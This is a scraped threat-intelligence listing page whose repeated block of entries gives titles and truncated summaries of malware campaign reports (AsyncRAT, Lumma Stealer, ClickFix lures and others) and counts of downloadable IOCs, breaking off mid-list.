Malware by the (Bit)Bucket: Uncovering AsyncRAT
A sophisticated attack campaign using Bitbucket as a legitimate platform to deliver AsyncRAT has been uncovered. The multi-stage approach involves a VBScript obfuscation layer, followed by a PowerShell payload delivery mechanism, and culminates in the execution of AsyncRAT. The attackers exploit Bi…
Downloadable IOCs 0
Not All Fun and Games: Lua Malware Targets Educational Sector and Student Gaming Engines
Over the past year, the delivery of Lua malware appears to have undergone simplification, possibly to reduce exposure to detection mechanisms. The malware is frequently delivered using obfuscated Lua scripts instead of compiled Lua bytecode, as the latter can trigger suspicion more easily.
Downloadable IOCs 18
Tweaking AsyncRAT: Using Python and TryCloudflare to Deploy Malware
A new AsyncRAT malware campaign utilizes TryCloudflare quick tunnels and Python packages to deliver malicious payloads. The attack chain involves HTML attachments with 'search-ms' URI protocol handlers, leading to LNK files that download BAT files. These BAT files then retrieve and execute Python s…
Downloadable IOCs 15
PowerShell Keylogger
A newly identified keylogger operating via PowerShell script has been analyzed, revealing its capabilities to capture keystrokes, gather system information, and exfiltrate data. The malware uses a cloud server in Finland as a proxy and an Onion server for C2 communication, ensuring anonymity. It im…
Downloadable IOCs 3
Exploring AsyncRAT and Infostealer Plugin Delivery Through…
This analysis details an AsyncRAT infection observed in August 2024, delivered via email. The attack chain involves a Windows Script File that downloads and executes various scripts, ultimately leading to the installation of AsyncRAT with an infostealer plugin. The malware targets multiple browsers…
Downloadable IOCs 8
Analyzing the Mekotio Trojan
The analysis delves into the Mekotio Trojan, a sophisticated malware that employs a PowerShell dropper to execute its payload. The dropper employs obfuscation techniques, such as custom XOR decryption, to conceal its operations. It collects system information, communicates with a command-and-contro…
Downloadable IOCs 2
Decoding the Stealthy Memory-Only Malware
This intelligence report provides an in-depth analysis of a complex, multi-stage malware campaign called PEAKLIGHT. It details the infection chain, starting with movie lure ZIP files containing malicious LNK files that initiate a JavaScript dropper. This dropper then executes a PowerShell downloade…
Downloadable IOCs 23
Report on Ukraine government attack campaign
Ukraine's government cybersecurity incident response team, CERT-UA, obtained information about the distribution of emails themed around prisoners of war, containing links to download an archive named 'spysok_kursk.zip'. This archive contained a CHM file with JavaScript code that launched an obfusca…
Downloadable IOCs 33
Multiple Malware Dropped Through MSI Package
An analysis reveals the distribution of malware through an MSI package, specifically SectopRat and Redline stealer. The malware employs techniques like executing malicious scripts, disabling security measures, and establishing persistence through scheduled tasks. It communicates with command-and-co…
Downloadable IOCs 11
Unmasking Cronus: How Fake PayPal Documents Execute Fileless Ransomware via PowerShell
The analysis reveals a sophisticated campaign employing fake PayPal receipts as lures to distribute a new variant of the Cronus ransomware. The infection chain begins with a malicious Word document containing an obfuscated VBA macro that downloads a PowerShell loader from a remote server. This load…
Downloadable IOCs 8
Detecting evolving threats: NetSupport RAT campaign
This analysis examines a recent malware campaign that utilizes the NetSupport RAT, a legitimate remote administration tool, for persistent infections. The threat actors behind this campaign employ obfuscation techniques and updates to evade detection. However, by identifying weaknesses in the obfus…
Downloadable IOCs 3
Distribution of AsyncRAT Disguised as Ebook
This analysis covers the distribution of AsyncRAT malware disguised as an ebook. The compressed file contains a malicious LNK and PowerShell scripts that ultimately execute AsyncRAT. The malware employs various techniques, such as obfuscation, task scheduling, and anti-VM and anti-AV capabilities, …
Downloadable IOCs 5
Kimsuky Group’s New Backdoor (HappyDoor)
This report provides a detailed analysis of the HappyDoor malware, a new backdoor utilized by the Kimsuky threat group known for targeting organizations with spear-phishing attacks. The malware employs sophisticated techniques like self-duplication, hidden execution paths, and encrypted communicati…
Downloadable IOCs 7
Turla: A Master of Deception
This report details a recent campaign by the Turla threat group involving malicious LNK files that deliver a fileless backdoor. The attack leverages compromised websites, PowerShell scripts, and MSBuild to deploy the payload, which employs various evasion techniques like disabling security features…
Downloadable IOCs 10
ProxyLogon and ProxyShell Used to Target Government Mail Servers in Asia, Europe, and South America
This analysis describes the identification of a server likely exploiting ProxyLogon and ProxyShell vulnerabilities to gain unauthorized access to government email servers across Asia, Europe, and South America. The threat actor leveraged open-source exploit code to infiltrate systems and steal sens…
Downloadable IOCs 4
Malvertising Campaign Leads to Execution of Oyster Backdoor
Rapid7 has observed a recent malvertising campaign that lures users into downloading malicious installers for popular software such as Google Chrome and Microsoft Teams.
Downloadable IOCs 13
AdsExhaust, a Newly Discovered Adware MasqueradingOculus…
In June 2024, the eSentire Threat Response Unit (TRU) identified adware, which we have dubbed AdsExhaust, being distributed through a fake Oculus installer application. The adware is capable of exfiltrating screenshots from infected devices and interacting with browsers using simulated keystrokes.
Downloadable IOCs 17
FHAPPI Campaign APT10 FreeHosting APT PowerSploit Poison Ivy
This analysis details a malicious campaign dubbed 'FHAPPI' by the researcher, which utilized compromised Geocities Japan accounts to host malware payloads. The campaign leveraged VBScript and PowerShell scripts to execute encoded commands, ultimately delivering the Poison Ivy remote access trojan (…
Downloadable IOCs 5
From Clipboard to Compromise: A PowerShell Self-Pwn
This intelligence report details a unique social engineering technique observed by Proofpoint researchers, leveraging users to copy and paste malicious PowerShell scripts to infect their computers. The threat actors TA571 and ClearFake activity cluster employ this method to deliver malware like Dar…
Downloadable IOCs 14
APT Attacks Using Cloud Storage
The report describes a malicious campaign where threat actors utilize cloud services like Google Drive, OneDrive, and Dropbox to distribute malware and collect user information. The attack process starts with a malicious shortcut file (LNK) that executes PowerShell scripts to download decoy documen…
Downloadable IOCs 1
Warning Against Phishing Emails Prompting Execution of Commands via Paste
This report details a phishing campaign distributing malicious HTML files through emails. The files prompt users to paste and run malicious PowerShell commands that initiate a multi-stage infection process. The campaign ultimately delivers the DarkGate malware, highlighting the importance of exerci…
Downloadable IOCs 15
Decoding Water Sigbin's Latest Obfuscation Tricks
The China-based threat group Water Sigbin, known for deploying cryptocurrency-mining malware, exhibited new techniques to evade detection. It exploited CVE-2017-3506 and CVE-2023-21839 to deploy a PowerShell script executing a miner. The script utilized complex encoding, environment variables to hi…
Downloadable IOCs 9
Gootloader walkthrough
The analysis delves into the intricate workings of the Gootloader malware campaign. Through a meticulously crafted social engineering scheme involving SEO poisoning and fake forums, threat actors lure unsuspecting victims into downloading a malicious JavaScript file disguised as a legitimate resour…
Downloadable IOCs 12
Spring Exacerbation: UAC-0006 increased cyberattacks
This report aims to provide insights into the ongoing cyber operations targeting Ukraine. It analyzes the tactics, techniques, and procedures employed by threat actors in their malicious campaigns. The document offers a comprehensive overview of the cybersecurity landscape in Ukraine, highlighting …
Downloadable IOCs 31
Analysis and Detection of CLOUD#REVERSER: An Attack Involving Threat Actors Compromising Systems Using A Sophisticated Cloud-Based Malware
Securonix Threat Research has uncovered a sophisticated malware campaign, dubbed CLOUD#REVERSER, that leverages popular cloud storage services like Google Drive and Dropbox for malware delivery, command execution, and data exfiltration. The infection chain starts with a phishing email containing a …
Downloadable IOCs 16
Exploring the Metamorfo Banking Trojan
This report delves into a malware campaign known as Metamorfo, a banking Trojan that spreads through malspam campaigns. It entices users to click on HTML attachments, initiating a series of activities focused on gathering system metadata. The infection chain involves obfuscation techniques, URL eva…
Downloadable IOCs 39
Mallox ranomware affiliate leverages PureCrypter in MS-SQL exploitation campaigns
A team from security firm Sekoia has observed a series of attacks targeting vulnerable assets, including MS-SQL, and Mallox ransomware, using techniques similar to that of the PureCrypter ransomware.
Downloadable IOCs 10
Phishing Campaigns Targeting USPS See as Much Web Traffic as the USPS Itself
Following the 2023 holiday season, Akamai researchers uncovered a significant amount of highly likely malicious activity and domains purporting to be associated with the United States Postal Service (USPS). Akamai researchers compared five months of DNS traffic to the legitimate domain, usps.com, w…
Downloadable IOCs 34
From IcedID to Dagon Locker Ransomware in 29 Days
This intrusion started in August 2023 with a phishing campaign that distributed IcedID malware. The phishing operation utilized the Prometheus Traffic Direction System (TDS) to deliver the malware and victims were directed to a fraudulent website, mimicking an Azure download portal.
Downloadable IOCs 33
Unmasking Lumma Stealer: Analyzing Deceptive Tactics with Fake CAPTCHA
Lumma Stealer, a sophisticated information-stealing malware, has evolved its tactics to employ fake CAPTCHA verification for payload delivery. The malware exploits legitimate software and uses multi-stage fileless techniques to evade detection. Its infection chain involves PowerShell scripts, proce…
Downloadable IOCs 23
Beware: Fake Google Meet Pages Deliver Infostealers in Ongoing ClickFix Campaign
Threat actors are using fake Google Meet web pages as part of the ClickFix campaign to deliver infostealers targeting Windows and macOS systems. The attackers display fake error messages in web browsers, tricking users into executing malicious PowerShell code. The campaign has expanded to impersona…
Downloadable IOCs 0
Burning Zero Days: Suspected Nation-State Adversary Targets Ivanti CSA
A zero-day vulnerability exploited by an advanced adversary to gain access to a victim’s network, according to research by FortiGuard Labs and the Centre for Strategic Intelligence (CISA).
Downloadable IOCs 17
HijackLoader evolution: abusing genuine signing certificates
A report by HarfangLab EDR and MITRE ATT&CK on the threat posed by the Lumma Stealer malware, published on 11 October, 2024, outlines the tactics used to deploy the malware.
Downloadable IOCs 69
Malware by the (Bit)Bucket: Uncovering AsyncRAT
A sophisticated attack campaign using Bitbucket as a legitimate platform to deliver AsyncRAT has been uncovered. The multi-stage approach involves a VBScript obfuscation layer, followed by a PowerShell payload delivery mechanism, and culminates in the execution of AsyncRAT. The attackers exploit Bi…
Downloadable IOCs 0
Not All Fun and Games: Lua Malware Targets Educational Sector and Student Gaming Engines
Over the past year, the delivery of Lua malware appears to have undergone simplification, possibly to reduce exposure to detection mechanisms. The malware is frequently delivered using obfuscated Lua scripts instead of compiled Lua bytecode, as the latter can trigger suspicion more easily.
Downloadable IOCs 18
Tweaking AsyncRAT: Using Python and TryCloudflare to Deploy Malware
A new AsyncRAT malware campaign utilizes TryCloudflare quick tunnels and Python packages to deliver malicious payloads. The attack chain involves HTML attachments with 'search-ms' URI protocol handlers, leading to LNK files that download BAT files. These BAT files then retrieve and execute Python s…
Downloadable IOCs 15
PowerShell Keylogger
A newly identified keylogger operating via PowerShell script has been analyzed, revealing its capabilities to capture keystrokes, gather system information, and exfiltrate data. The malware uses a cloud server in Finland as a proxy and an Onion server for C2 communication, ensuring anonymity. It im…
Downloadable IOCs 3
Exploring AsyncRAT and Infostealer Plugin Delivery Through…
This analysis details an AsyncRAT infection observed in August 2024, delivered via email. The attack chain involves a Windows Script File that downloads and executes various scripts, ultimately leading to the installation of AsyncRAT with an infostealer plugin. The malware targets multiple browsers…
Downloadable IOCs 8
Analyzing the Mekotio Trojan
The analysis delves into the Mekotio Trojan, a sophisticated malware that employs a PowerShell dropper to execute its payload. The dropper employs obfuscation techniques, such as custom XOR decryption, to conceal its operations. It collects system information, communicates with a command-and-contro…
Downloadable IOCs 2
Decoding the Stealthy Memory-Only Malware
This intelligence report provides an in-depth analysis of a complex, multi-stage malware campaign called PEAKLIGHT. It details the infection chain, starting with movie lure ZIP files containing malicious LNK files that initiate a JavaScript dropper. This dropper then executes a PowerShell downloade…
Downloadable IOCs 23
Report on Ukraine government attack campaign
Ukraine's government cybersecurity incident response team, CERT-UA, obtained information about the distribution of emails themed around prisoners of war, containing links to download an archive named 'spysok_kursk.zip'. This archive contained a CHM file with JavaScript code that launched an obfusca…
Downloadable IOCs 33
Multiple Malware Dropped Through MSI Package
An analysis reveals the distribution of malware through an MSI package, specifically SectopRat and Redline stealer. The malware employs techniques like executing malicious scripts, disabling security measures, and establishing persistence through scheduled tasks. It communicates with command-and-co…
Downloadable IOCs 11
Unmasking Cronus: How Fake PayPal Documents Execute Fileless Ransomware via PowerShell
The analysis reveals a sophisticated campaign employing fake PayPal receipts as lures to distribute a new variant of the Cronus ransomware. The infection chain begins with a malicious Word document containing an obfuscated VBA macro that downloads a PowerShell loader from a remote server. This load…
Downloadable IOCs 8
Detecting evolving threats: NetSupport RAT campaign
This analysis examines a recent malware campaign that utilizes the NetSupport RAT, a legitimate remote administration tool, for persistent infections. The threat actors behind this campaign employ obfuscation techniques and updates to evade detection. However, by identifying weaknesses in the obfus…
Downloadable IOCs 3
Distribution of AsyncRAT Disguised as Ebook
This analysis covers the distribution of AsyncRAT malware disguised as an ebook. The compressed file contains a malicious LNK and PowerShell scripts that ultimately execute AsyncRAT. The malware employs various techniques, such as obfuscation, task scheduling, and anti-VM and anti-AV capabilities, …
Downloadable IOCs 5
Kimsuky Group’s New Backdoor (HappyDoor)
This report provides a detailed analysis of the HappyDoor malware, a new backdoor utilized by the Kimsuky threat group known for targeting organizations with spear-phishing attacks. The malware employs sophisticated techniques like self-duplication, hidden execution paths, and encrypted communicati…
Downloadable IOCs 7
Turla: A Master of Deception
This report details a recent campaign by the Turla threat group involving malicious LNK files that deliver a fileless backdoor. The attack leverages compromised websites, PowerShell scripts, and MSBuild to deploy the payload, which employs various evasion techniques like disabling security features…
Downloadable IOCs 10
ProxyLogon and ProxyShell Used to Target Government Mail Servers in Asia, Europe, and South America
This analysis describes the identification of a server likely exploiting ProxyLogon and ProxyShell vulnerabilities to gain unauthorized access to government email servers across Asia, Europe, and South America. The threat actor leveraged open-source exploit code to infiltrate systems and steal sens…
Downloadable IOCs 4
Malvertising Campaign Leads to Execution of Oyster Backdoor
Rapid7 has observed a recent malvertising campaign that lures users into downloading malicious installers for popular software such as Google Chrome and Microsoft Teams.
Downloadable IOCs 13
AdsExhaust, a Newly Discovered Adware MasqueradingOculus…
In June 2024, the eSentire Threat Response Unit (TRU) identified adware, which we have dubbed AdsExhaust, being distributed through a fake Oculus installer application. The adware is capable of exfiltrating screenshots from infected devices and interacting with browsers using simulated keystrokes.
Downloadable IOCs 17
FHAPPI Campaign APT10 FreeHosting APT PowerSploit Poison Ivy
This analysis details a malicious campaign dubbed 'FHAPPI' by the researcher, which utilized compromised Geocities Japan accounts to host malware payloads. The campaign leveraged VBScript and PowerShell scripts to execute encoded commands, ultimately delivering the Poison Ivy remote access trojan (…
Downloadable IOCs 5
From Clipboard to Compromise: A PowerShell Self-Pwn
This intelligence report details a unique social engineering technique observed by Proofpoint researchers, leveraging users to copy and paste malicious PowerShell scripts to infect their computers. The threat actors TA571 and ClearFake activity cluster employ this method to deliver malware like Dar…
Downloadable IOCs 14
APT Attacks Using Cloud Storage
The report describes a malicious campaign where threat actors utilize cloud services like Google Drive, OneDrive, and Dropbox to distribute malware and collect user information. The attack process starts with a malicious shortcut file (LNK) that executes PowerShell scripts to download decoy documen…
Downloadable IOCs 1
Warning Against Phishing Emails Prompting Execution of Commands via Paste
This report details a phishing campaign distributing malicious HTML files through emails. The files prompt users to paste and run malicious PowerShell commands that initiate a multi-stage infection process. The campaign ultimately delivers the DarkGate malware, highlighting the importance of exerci…
Downloadable IOCs 15
Decoding Water Sigbin's Latest Obfuscation Tricks
The China-based threat group Water Sigbin, known for deploying cryptocurrency-mining malware, exhibited new techniques to evade detection. It exploited CVE-2017-3506 and CVE-2023-21839 to deploy a PowerShell script executing a miner. The script utilized complex encoding, environment variables to hi…
Downloadable IOCs 9
Gootloader walkthrough
The analysis delves into the intricate workings of the Gootloader malware campaign. Through a meticulously crafted social engineering scheme involving SEO poisoning and fake forums, threat actors lure unsuspecting victims into downloading a malicious JavaScript file disguised as a legitimate resour…
Downloadable IOCs 12
Spring Exacerbation: UAC-0006 increased cyberattacks
This report aims to provide insights into the ongoing cyber operations targeting Ukraine. It analyzes the tactics, techniques, and procedures employed by threat actors in their malicious campaigns. The document offers a comprehensive overview of the cybersecurity landscape in Ukraine, highlighting …
Downloadable IOCs 31
Analysis and Detection of CLOUD#REVERSER: An Attack Involving Threat Actors Compromising Systems Using A Sophisticated Cloud-Based Malware
Securonix Threat Research has uncovered a sophisticated malware campaign, dubbed CLOUD#REVERSER, that leverages popular cloud storage services like Google Drive and Dropbox for malware delivery, command execution, and data exfiltration. The infection chain starts with a phishing email containing a …
Downloadable IOCs 16
Exploring the Metamorfo Banking Trojan
This report delves into a malware campaign known as Metamorfo, a banking Trojan that spreads through malspam campaigns. It entices users to click on HTML attachments, initiating a series of activities focused on gathering system metadata. The infection chain involves obfuscation techniques, URL eva…
Downloadable IOCs 39
Mallox ranomware affiliate leverages PureCrypter in MS-SQL exploitation campaigns
A team from security firm Sekoia has observed a series of attacks targeting vulnerable assets, including MS-SQL, and Mallox ransomware, using techniques similar to that of the PureCrypter ransomware.
Downloadable IOCs 10
Phishing Campaigns Targeting USPS See as Much Web Traffic as the USPS Itself
Following the 2023 holiday season, Akamai researchers uncovered a significant amount of highly likely malicious activity and domains purporting to be associated with the United States Postal Service (USPS). Akamai researchers compared five months of DNS traffic to the legitimate domain, usps.com, w…
Downloadable IOCs 34
From IcedID to Dagon Locker Ransomware in 29 Days
This intrusion started in August 2023 with a phishing campaign that distributed IcedID malware. The phishing operation utilized the Prometheus Traffic Direction System (TDS) to deliver the malware and victims were directed to a fraudulent website, mimicking an Azure download portal.
Downloadable IOCs 33
Unmasking Lumma Stealer: Analyzing Deceptive Tactics with Fake CAPTCHA
Lumma Stealer, a sophisticated information-stealing malware, has evolved its tactics to employ fake CAPTCHA verification for payload delivery. The malware exploits legitimate software and uses multi-stage fileless techniques to evade detection. Its infection chain involves PowerShell scripts, proce…
Downloadable IOCs 23
Beware: Fake Google Meet Pages Deliver Infostealers in Ongoing ClickFix Campaign
Threat actors are using fake Google Meet web pages as part of the ClickFix campaign to deliver infostealers targeting Windows and macOS systems. The attackers display fake error messages in web browsers, tricking users into executing malicious PowerShell code. The campaign has expanded to impersona…
Downloadable IOCs 0
Burning Zero Days: Suspected Nation-State Adversary Targets Ivanti CSA
A zero-day vulnerability exploited by an advanced adversary to gain access to a victim’s network, according to research by FortiGuard Labs and the Centre for Strategic Intelligence (CISA).
Downloadable IOCs 17
HijackLoader evolution: abusing genuine signing certificates
A report by HarfangLab EDR and MITRE ATT&CK on the threat posed by the Lumma Stealer malware, published on 11 October, 2024, outlines the tactics used to deploy the malware.
Downloadable IOCs 69
Malware by the (Bit)Bucket: Uncovering AsyncRAT
A sophisticated attack campaign using Bitbucket as a legitimate platform to deliver AsyncRAT has been uncovered. The multi-stage approach involves a VBScript obfuscation layer, followed by a PowerShell payload delivery mechanism, and culminates in the execution of AsyncRAT. The attackers exploit Bi…
Downloadable IOCs 0
Not All Fun and Games: Lua Malware Targets Educational Sector and Student Gaming Engines
Over the past year, the delivery of Lua malware appears to have undergone simplification, possibly to reduce exposure to detection mechanisms. The malware is frequently delivered using obfuscated Lua scripts instead of compiled Lua bytecode, as the latter can trigger suspicion more easily.
Downloadable IOCs 18
Tweaking AsyncRAT: Using Python and TryCloudflare to Deploy Malware
A new AsyncRAT malware campaign utilizes TryCloudflare quick tunnels and Python packages to deliver malicious payloads. The attack chain involves HTML attachments with 'search-ms' URI protocol handlers, leading to LNK files that download BAT files. These BAT files then retrieve and execute Python s…
Downloadable IOCs 15
PowerShell Keylogger
A newly identified keylogger operating via PowerShell script has been analyzed, revealing its capabilities to capture keystrokes, gather system information, and exfiltrate data. The malware uses a cloud server in Finland as a proxy and an Onion server for C2 communication, ensuring anonymity. It im…
Downloadable IOCs 3
Exploring AsyncRAT and Infostealer Plugin Delivery Through…
This analysis details an AsyncRAT infection observed in August 2024, delivered via email. The attack chain involves a Windows Script File that downloads and executes various scripts, ultimately leading to the installation of AsyncRAT with an infostealer plugin. The malware targets multiple browsers…
Downloadable IOCs 8
Analyzing the Mekotio Trojan
The analysis delves into the Mekotio Trojan, a sophisticated malware that employs a PowerShell dropper to execute its payload. The dropper employs obfuscation techniques, such as custom XOR decryption, to conceal its operations. It collects system information, communicates with a command-and-contro…
Downloadable IOCs 2
Decoding the Stealthy Memory-Only Malware
This intelligence report provides an in-depth analysis of a complex, multi-stage malware campaign called PEAKLIGHT. It details the infection chain, starting with movie lure ZIP files containing malicious LNK files that initiate a JavaScript dropper. This dropper then executes a PowerShell downloade…
Downloadable IOCs 23
Report on Ukraine government attack campaign
Ukraine's government cybersecurity incident response team, CERT-UA, obtained information about the distribution of emails themed around prisoners of war, containing links to download an archive named 'spysok_kursk.zip'. This archive contained a CHM file with JavaScript code that launched an obfusca…
Downloadable IOCs 33
Multiple Malware Dropped Through MSI Package
An analysis reveals the distribution of malware through an MSI package, specifically SectopRat and Redline stealer. The malware employs techniques like executing malicious scripts, disabling security measures, and establishing persistence through scheduled tasks. It communicates with command-and-co…
Downloadable IOCs 11
Unmasking Cronus: How Fake PayPal Documents Execute Fileless Ransomware via PowerShell
The analysis reveals a sophisticated campaign employing fake PayPal receipts as lures to distribute a new variant of the Cronus ransomware. The infection chain begins with a malicious Word document containing an obfuscated VBA macro that downloads a PowerShell loader from a remote server. This load…
Downloadable IOCs 8
Detecting evolving threats: NetSupport RAT campaign
This analysis examines a recent malware campaign that utilizes the NetSupport RAT, a legitimate remote administration tool, for persistent infections. The threat actors behind this campaign employ obfuscation techniques and updates to evade detection. However, by identifying weaknesses in the obfus…
Downloadable IOCs 3
Distribution of AsyncRAT Disguised as Ebook
This analysis covers the distribution of AsyncRAT malware disguised as an ebook. The compressed file contains a malicious LNK and PowerShell scripts that ultimately execute AsyncRAT. The malware employs various techniques, such as obfuscation, task scheduling, and anti-VM and anti-AV capabilities, …
Downloadable IOCs 5
Kimsuky Group’s New Backdoor (HappyDoor)
This report provides a detailed analysis of the HappyDoor malware, a new backdoor utilized by the Kimsuky threat group known for targeting organizations with spear-phishing attacks. The malware employs sophisticated techniques like self-duplication, hidden execution paths, and encrypted communicati…
Downloadable IOCs 7
Turla: A Master of Deception
This report details a recent campaign by the Turla threat group involving malicious LNK files that deliver a fileless backdoor. The attack leverages compromised websites, PowerShell scripts, and MSBuild to deploy the payload, which employs various evasion techniques like disabling security features…
Downloadable IOCs 10
ProxyLogon and ProxyShell Used to Target Government Mail Servers in Asia, Europe, and South America
This analysis describes the identification of a server likely exploiting ProxyLogon and ProxyShell vulnerabilities to gain unauthorized access to government email servers across Asia, Europe, and South America. The threat actor leveraged open-source exploit code to infiltrate systems and steal sens…
Downloadable IOCs 4
Malvertising Campaign Leads to Execution of Oyster Backdoor
Rapid7 has observed a recent malvertising campaign that lures users into downloading malicious installers for popular software such as Google Chrome and Microsoft Teams.
Downloadable IOCs 13
AdsExhaust, a Newly Discovered Adware MasqueradingOculus…
In June 2024, the eSentire Threat Response Unit (TRU) identified adware, which we have dubbed AdsExhaust, being distributed through a fake Oculus installer application. The adware is capable of exfiltrating screenshots from infected devices and interacting with browsers using simulated keystrokes.
Downloadable IOCs 17
FHAPPI Campaign APT10 FreeHosting APT PowerSploit Poison Ivy
This analysis details a malicious campaign dubbed 'FHAPPI' by the researcher, which utilized compromised Geocities Japan accounts to host malware payloads. The campaign leveraged VBScript and PowerShell scripts to execute encoded commands, ultimately delivering the Poison Ivy remote access trojan (…
Downloadable IOCs 5
From Clipboard to Compromise: A PowerShell Self-Pwn
This intelligence report details a unique social engineering technique observed by Proofpoint researchers, leveraging users to copy and paste malicious PowerShell scripts to infect their computers. The threat actors TA571 and ClearFake activity cluster employ this method to deliver malware like Dar…
Downloadable IOCs 14
APT Attacks Using Cloud Storage
The report describes a malicious campaign where threat actors utilize cloud services like Google Drive, OneDrive, and Dropbox to distribute malware and collect user information. The attack process starts with a malicious shortcut file (LNK) that executes PowerShell scripts to download decoy documen…
Downloadable IOCs 1
Warning Against Phishing Emails Prompting Execution of Commands via Paste
This report details a phishing campaign distributing malicious HTML files through emails. The files prompt users to paste and run malicious PowerShell commands that initiate a multi-stage infection process. The campaign ultimately delivers the DarkGate malware, highlighting the importance of exerci…
Downloadable IOCs 15
Decoding Water Sigbin's Latest Obfuscation Tricks
The China-based threat group Water Sigbin, known for deploying cryptocurrency-mining malware, exhibited new techniques to evade detection. It exploited CVE-2017-3506 and CVE-2023-21839 to deploy a PowerShell script executing a miner. The script utilized complex encoding, environment variables to hi…
Downloadable IOCs 9
Gootloader walkthrough
The analysis delves into the intricate workings of the Gootloader malware campaign. Through a meticulously crafted social engineering scheme involving SEO poisoning and fake forums, threat actors lure unsuspecting victims into downloading a malicious JavaScript file disguised as a legitimate resour…
Downloadable IOCs 12
Spring Exacerbation: UAC-0006 increased cyberattacks
This report aims to provide insights into the ongoing cyber operations targeting Ukraine. It analyzes the tactics, techniques, and procedures employed by threat actors in their malicious campaigns. The document offers a comprehensive overview of the cybersecurity landscape in Ukraine, highlighting …
Downloadable IOCs 31
Analysis and Detection of CLOUD#REVERSER: An Attack Involving Threat Actors Compromising Systems Using A Sophisticated Cloud-Based Malware
Securonix Threat Research has uncovered a sophisticated malware campaign, dubbed CLOUD#REVERSER, that leverages popular cloud storage services like Google Drive and Dropbox for malware delivery, command execution, and data exfiltration. The infection chain starts with a phishing email containing a …
Downloadable IOCs 16
Exploring the Metamorfo Banking Trojan
This report delves into a malware campaign known as Metamorfo, a banking Trojan that spreads through malspam campaigns. It entices users to click on HTML attachments, initiating a series of activities focused on gathering system metadata. The infection chain involves obfuscation techniques, URL eva…
Downloadable IOCs 39
Mallox ranomware affiliate leverages PureCrypter in MS-SQL exploitation campaigns
A team from security firm Sekoia has observed a series of attacks targeting vulnerable assets, including MS-SQL, and Mallox ransomware, using techniques similar to that of the PureCrypter ransomware.
Downloadable IOCs 10
Phishing Campaigns Targeting USPS See as Much Web Traffic as the USPS Itself
Following the 2023 holiday season, Akamai researchers uncovered a significant amount of highly likely malicious activity and domains purporting to be associated with the United States Postal Service (USPS). Akamai researchers compared five months of DNS traffic to the legitimate domain, usps.com, w…
Downloadable IOCs 34
From IcedID to Dagon Locker Ransomware in 29 Days
This intrusion started in August 2023 with a phishing campaign that distributed IcedID malware. The phishing operation utilized the Prometheus Traffic Direction System (TDS) to deliver the malware and victims were directed to a fraudulent website, mimicking an Azure download portal.
Downloadable IOCs 33
Unmasking Lumma Stealer: Analyzing Deceptive Tactics with Fake CAPTCHA
Lumma Stealer, a sophisticated information-stealing malware, has evolved its tactics to employ fake CAPTCHA verification for payload delivery. The malware exploits legitimate software and uses multi-stage fileless techniques to evade detection. Its infection chain involves PowerShell scripts, proce…
Downloadable IOCs 23
Beware: Fake Google Meet Pages Deliver Infostealers in Ongoing ClickFix Campaign
Threat actors are using fake Google Meet web pages as part of the ClickFix campaign to deliver infostealers targeting Windows and macOS systems. The attackers display fake error messages in web browsers, tricking users into executing malicious PowerShell code. The campaign has expanded to impersona…
Downloadable IOCs 0
Burning Zero Days: Suspected Nation-State Adversary Targets Ivanti CSA
A zero-day vulnerability exploited by an advanced adversary to gain access to a victim’s network, according to research by FortiGuard Labs and the Centre for Strategic Intelligence (CISA).
Downloadable IOCs 17
HijackLoader evolution: abusing genuine signing certificates
A report by HarfangLab EDR and MITRE ATT&CK on the threat posed by the Lumma Stealer malware, published on 11 October, 2024, outlines the tactics used to deploy the malware.
Downloadable IOCs 69
Malware by the (Bit)Bucket: Uncovering AsyncRAT
A sophisticated attack campaign using Bitbucket as a legitimate platform to deliver AsyncRAT has been uncovered. The multi-stage approach involves a VBScript obfuscation layer, followed by a PowerShell payload delivery mechanism, and culminates in the execution of AsyncRAT. The attackers exploit Bi…
Downloadable IOCs 0
Not All Fun and Games: Lua Malware Targets Educational Sector and Student Gaming Engines
Over the past year, the delivery of Lua malware appears to have undergone simplification, possibly to reduce exposure to detection mechanisms. The malware is frequently delivered using obfuscated Lua scripts instead of compiled Lua bytecode, as the latter can trigger suspicion more easily.
Downloadable IOCs 18
Tweaking AsyncRAT: Using Python and TryCloudflare to Deploy Malware
A new AsyncRAT malware campaign utilizes TryCloudflare quick tunnels and Python packages to deliver malicious payloads. The attack chain involves HTML attachments with 'search-ms' URI protocol handlers, leading to LNK files that download BAT files. These BAT files then retrieve and execute Python s…
Downloadable IOCs 15
PowerShell Keylogger
A newly identified keylogger operating via PowerShell script has been analyzed, revealing its capabilities to capture keystrokes, gather system information, and exfiltrate data. The malware uses a cloud server in Finland as a proxy and an Onion server for C2 communication, ensuring anonymity. It im…
Downloadable IOCs 3
Exploring AsyncRAT and Infostealer Plugin Delivery Through…
This analysis details an AsyncRAT infection observed in August 2024, delivered via email. The attack chain involves a Windows Script File that downloads and executes various scripts, ultimately leading to the installation of AsyncRAT with an infostealer plugin. The malware targets multiple browsers…
Downloadable IOCs 8
Analyzing the Mekotio Trojan
The analysis delves into the Mekotio Trojan, a sophisticated malware that employs a PowerShell dropper to execute its payload. The dropper employs obfuscation techniques, such as custom XOR decryption, to conceal its operations. It collects system information, communicates with a command-and-contro…
Downloadable IOCs 2
Decoding the Stealthy Memory-Only Malware
This intelligence report provides an in-depth analysis of a complex, multi-stage malware campaign called PEAKLIGHT. It details the infection chain, starting with movie lure ZIP files containing malicious LNK files that initiate a JavaScript dropper. This dropper then executes a PowerShell downloade…
Downloadable IOCs 23
Report on Ukraine government attack campaign
Ukraine's government cybersecurity incident response team, CERT-UA, obtained information about the distribution of emails themed around prisoners of war, containing links to download an archive named 'spysok_kursk.zip'. This archive contained a CHM file with JavaScript code that launched an obfusca…
Downloadable IOCs 33
Multiple Malware Dropped Through MSI Package
An analysis reveals the distribution of malware through an MSI package, specifically SectopRat and Redline stealer. The malware employs techniques like executing malicious scripts, disabling security measures, and establishing persistence through scheduled tasks. It communicates with command-and-co…
Downloadable IOCs 11
Unmasking Cronus: How Fake PayPal Documents Execute Fileless Ransomware via PowerShell
The analysis reveals a sophisticated campaign employing fake PayPal receipts as lures to distribute a new variant of the Cronus ransomware. The infection chain begins with a malicious Word document containing an obfuscated VBA macro that downloads a PowerShell loader from a remote server. This load…
Downloadable IOCs 8
Detecting evolving threats: NetSupport RAT campaign
This analysis examines a recent malware campaign that utilizes the NetSupport RAT, a legitimate remote administration tool, for persistent infections. The threat actors behind this campaign employ obfuscation techniques and updates to evade detection. However, by identifying weaknesses in the obfus…
Downloadable IOCs 3
Distribution of AsyncRAT Disguised as Ebook
